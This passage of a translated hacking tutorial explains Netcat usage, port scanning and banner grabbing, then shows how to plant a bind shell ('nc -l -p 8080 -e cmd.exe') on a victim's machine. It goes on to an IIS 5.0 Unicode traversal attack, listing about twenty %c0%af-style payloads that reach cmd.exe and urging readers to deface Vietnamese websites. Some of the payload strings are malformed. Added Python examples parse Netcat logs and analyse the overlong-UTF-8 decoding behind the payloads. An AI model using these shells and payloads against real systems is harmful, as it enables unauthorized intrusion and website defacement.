- if you want to run Netcat as nc instead of ./nc, edit the PATH variable in ~/.bashrc and append ":." : PATH=/sbin:/usr/sbin:...:. (Be aware that putting the current directory on PATH lets any program in whatever directory you are in shadow a system command; copying nc into a directory already on PATH, such as /usr/local/bin, is safer.)
_ The Windows version of Netcat needs no compiling: it comes with the binary nc.exe. Just unzip and run.

c.) Netcat options:
_ Netcat runs at the command line. Run nc -h to see the parameters:

CODE
C:\> nc -h
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:

-d          detach Netcat from the command window or console; it runs hidden, without a Taskbar entry (Windows)
-e prog     execute program prog when a connection comes in; mostly used in listen mode
-h          show help
-i secs     wait secs seconds between lines sent and between ports scanned
-l          put Netcat into listen mode, waiting for inbound connections
-L          make Netcat "keep" listening: after a connection closes it listens again (Windows version)
-n          numeric IP addresses only, e.g. 192.168.16.7; Netcat does no DNS lookups
-o file     write a hex dump of the traffic to file
-p port     specify the local port
-r          randomize local and remote port numbers
-s addr     use addr as the source address (it must be an address this machine owns: Netcat binds to it, it does not forge packets)
-t          answer telnet negotiation: when you connect to a telnet daemon (telnetd) it asks the client for options and environment values such as TERM and USER; with -t Netcat refuses those requests instead of leaving the negotiation bytes in your session
-u          use UDP (the default is TCP)
-v          show details of the current connection
-vv         show even more details
-w secs     set a timeout of secs seconds for connects and final reads
-z          zero-I/O mode, used for port scanning

Netcat accepts port ranges, written port1-port2. For example, 1-8080 means 1, 2, 3, ..., 8080.

d.) Learning Netcat by example:

_ Grabbing a web server's banner:

Example: nc to 172.16.84.2, port 80

CODE
C:\> nc 172.16.84.2 80
HEAD / HTTP/1.0          (press Enter twice here)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html

For details about the connection, use -v (-vv gives even more detail):

C:\> nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK

If you want a log, use -o. For example:

nc -vv -o nhat_ki.log 172.16.84.2 80

Open nhat_ki.log to see what it recorded:

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a                                  # l....

A line starting with < is data the server sent to netcat; a line starting with > is data netcat sent to the server.
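A parser for the -o log format shown above, as an added example (not code from the page or from Netcat): it rebuilds the two byte streams from the direction marker, offset and hex columns, checks that the offsets are contiguous so a truncated or hand-edited log is caught, and then reads the status line and headers out of the reassembled server response. The log text it runs on is constructed for the example (a HEAD request and a minimal reply), not captured from a real host; the page's own nhat_ki.log has exactly the same shape.

```python
import re

# One record written by `nc -o file`: direction, 8-digit hex offset, up to
# 16 hex bytes, '#', then the printable rendering of those bytes.
LINE_RE = re.compile(r'^([<>]) ([0-9a-f]{8}) ((?:[0-9a-f]{2} )+)\s*#')

# Constructed sample (not a real capture): a HEAD request and a short reply.
SAMPLE_LOG = """\
> 00000000 48 45 41 44 20 2f 20 48 54 54 50 2f 31 2e 30 0d # HEAD / HTTP/1.0.
> 00000010 0a 0d 0a                                        # ...
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d # .Server: Apache.
< 00000020 0a 0d 0a                                        # ...
"""


def parse_hexdump(text):
    """Return {'sent': bytes, 'received': bytes} rebuilt from a netcat -o log.

    Raises ValueError on a line that is not a netcat record or whose offset
    does not continue the stream (a sign the log was cut or edited)."""
    streams = {'>': bytearray(), '<': bytearray()}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f'line {lineno}: not a netcat -o record: {line!r}')
        direction, offset, hexpart = m.group(1), int(m.group(2), 16), m.group(3)
        if offset != len(streams[direction]):
            raise ValueError(f'line {lineno}: offset {offset:#x} but stream has '
                             f'{len(streams[direction])} bytes')
        streams[direction] += bytes.fromhex(''.join(hexpart.split()))
    return {'sent': bytes(streams['>']), 'received': bytes(streams['<'])}


def parse_http_response(data):
    """Split a raw HTTP response into (status line, {header: value})."""
    head, _, _body = data.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(':')
        headers[name.strip()] = value.strip()
    return lines[0], headers


if __name__ == '__main__':
    streams = parse_hexdump(SAMPLE_LOG)
    print('sent    :', streams['sent'])
    status, headers = parse_http_response(streams['received'])
    print('status  :', status)
    print('Server  :', headers.get('Server'))
```

The offset check is the part worth keeping when you adapt this: the hex column is easy to trust and hard to eyeball, and a log that skips or repeats a block will otherwise decode into a plausible but wrong response.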

_ Port scanning: run netcat with the -z option. To scan faster, add -n so that netcat skips DNS lookups. Example: scan TCP ports 1 to 500 of host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open

If you need to scan UDP ports, add -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

Take the UDP results with care: netcat reports a UDP port as "open" when no ICMP port-unreachable comes back, so a port that a firewall silently drops looks exactly like one with a listener behind it.

_ Turning Netcat into a trojan: on the victim's machine, start netcat in listen mode with -l (listen) and -p port to pick the port to listen on; -e makes netcat run a program when a connection arrives, usually a command shell: cmd.exe (on NT) or /bin/sh (on Unix). Example:

CODE
E:\> nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error

On the attacking machine, just use netcat to connect to the victim on that port, here 8080

CODE
C:\> nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\> cd test
cd test

E:\test> dir /w
dir /w
 Volume in drive E has no label.
 Volume Serial Number is B465-452F

 Directory of E:\test

[.]           [..]          head.log      NETUSERS.EXE  NetView.exe
ntcrash.zip   password.txt  pwdump.exe
               6 File(s)        262,499 bytes
               2 Dir(s)     191,488,000 bytes free

E:\test> exit
exit
sent 20, rcvd 450: NOTSOCK

As you can see, we can now do whatever we like on the victim's machine: with a few basic commands we have taken over the opponent's computer. Read on:

With -l, netcat quits once the first connection closes. With -L (Windows version) it goes back to listening after each connection, so the shell is waiting again the next time you connect:

CODE
E:\> nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...

With Netcat for Windows only, you can even listen on a port that something else is already listening on. Just give the source address with -s <ip_address_of_this_machine>. Example:

CODE
netstat -a
...
TCP    nan_nhan:domain    nan_nhan:0    LISTENING      <- port 53 is already listening
...
E:\> nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53        -> listen right on port 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163

On Windows NT, putting Netcat into listen mode does not need Administrator rights: log in with an ordinary user account and start Netcat, that is all. Note: you cannot run netcat with ... -u -e cmd.exe ... or ... -u -e /bin/sh ... because netcat does not work properly over UDP in that mode. If you want a UDP shell on Unix, use udpshell instead of netcat.

(Based on brother Vicky's article.)

49.) Hacking IIS server 5.0:

_ Every IIS server version up to 5.0 has flaws we can exploit; since almost everyone now runs IIS server 5.0, I will not go into the flaws of the earlier versions. Now I will show you how to hack using ActivePerl and IE; you can apply it to Vietnamese websites, a great many of which have this flaw. Let's begin.
_ First, download ActivePerl and Unicode.pl.
_ Use telnet to find out whether the site we are attacking runs IIS server 5.0:

CODE
telnet <site name> 80
HEAD / HTTP/1.0
                  (press Enter twice; the Server: header in the reply names the software, e.g. Microsoft-IIS/5.0)

If it does not tell you what software the target is running, replace port 80 with other ports such as 8080, 81, 8000, 8001, and so on.
_ Once the target is confirmed, go to DOS and type:

CODE
perl unicode.pl
Host: (type the address of the server you want to hack)
Port: 80 (or 8080, 81, 8000, 8001, whichever port you telnetted to earlier)

_ You will see the table of flaws (programmed into Unicode.pl) like this:

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2] /scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

You will see all of these lines if the victim site has every one of the flaws; if the victim's server only has flaws 13 and 17, only lines 13 and 17 appear. Say the table tells me the victim has flaws 3 and 7; I open IE and type the corresponding string into the Address bar:

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+   <== line 3
or
http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+   <== line 7

At this point you are inside the victim's server: put the DOS command after /c+ (with + in place of spaces, for example /c+dir+c:\) to dig out the information you want. Websites usually sit in \inetpub\wwwroot; once you are in there, just replace index.html with your "hacked by" page. That is all there is to it; don't go wild.
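What the %c0%af strings in the table above actually do, as an added example (not code from this page or from Unicode.pl): the vulnerable IIS path canonicaliser accepted "overlong" UTF-8, multi-byte sequences that encode a code point which fits in fewer bytes, so %c0%af decoded to "/" and %c1%9c to "\" only after the ".." check had already been done on the raw text. The block below implements that lenient decoder beside Python's strict one, classifies each table entry by whether it yields a traversal step that only the lenient decoder sees, and shows where the request lands after normalisation. The entries with non-hex escapes such as %c1%pc are left in the table as the page gives them; the code reports them as undecodable rather than guessing.

```python
import posixpath
from urllib.parse import unquote_to_bytes


def lenient_utf8(data):
    """Decode UTF-8 the way the flawed canonicaliser did: a multi-byte sequence
    is accepted even when the code point would fit in fewer bytes (an overlong
    form). Raises ValueError on a malformed sequence."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        for mask, lead, n in ((0xE0, 0xC0, 1), (0xF0, 0xE0, 2), (0xF8, 0xF0, 3),
                              (0xFC, 0xF8, 4), (0xFE, 0xFC, 5)):
            if b & mask == lead:
                cp = b & (0xFF ^ mask)          # payload bits of the lead byte
                break
        else:
            raise ValueError(f'bad lead byte {b:#x} at {i}')
        tail = data[i + 1:i + 1 + n]
        if len(tail) != n or any(t & 0xC0 != 0x80 for t in tail):
            raise ValueError(f'bad continuation after byte {i}')
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp))
        i += 1 + n
    return ''.join(out)


def strict_utf8(data):
    """A conforming decoder refuses overlong forms outright; returns None then."""
    try:
        return data.decode('utf-8')
    except UnicodeDecodeError:
        return None


def decoded_forms(url_path):
    """(strict, lenient) decodings of the path part of a URL, None where a decoder refuses."""
    raw = unquote_to_bytes(url_path.split('?', 1)[0])
    try:
        lenient = lenient_utf8(raw)
    except ValueError:
        lenient = None
    return strict_utf8(raw), lenient


def is_overlong_traversal(url_path):
    """True when the lenient decode produces a '/../' step that a strict decode
    does not: the signature of the %c0%af family. A plain ../ is not flagged,
    since the server normalises that before any check."""
    strict, lenient = decoded_forms(url_path)
    if lenient is None:
        return False
    lenient = lenient.replace('\\', '/')
    if '/../' not in lenient:
        return False
    return strict is None or '/../' not in strict.replace('\\', '/')


def resolved_target(url_path):
    """Where the request lands once the lenient decode is normalised."""
    _, lenient = decoded_forms(url_path)
    if lenient is None:
        return None
    return posixpath.normpath(lenient.replace('\\', '/'))


if __name__ == '__main__':
    for entry in ('/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\',
                  '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+',
                  '/scripts/..%c1%af../winnt/system32/cmd.exe?/c+',
                  '/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+'):
        print(is_overlong_traversal(entry), resolved_target(entry), entry)
```

Note that entry [9], %c1%af, lenient-decodes to the letter "o" rather than a separator, so it yields "..o.." and no traversal; the scanner lists it anyway, which is a reminder that a line in the table means only that the tool sent the probe, not that the probe does anything.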

GOOD LUCK!!!
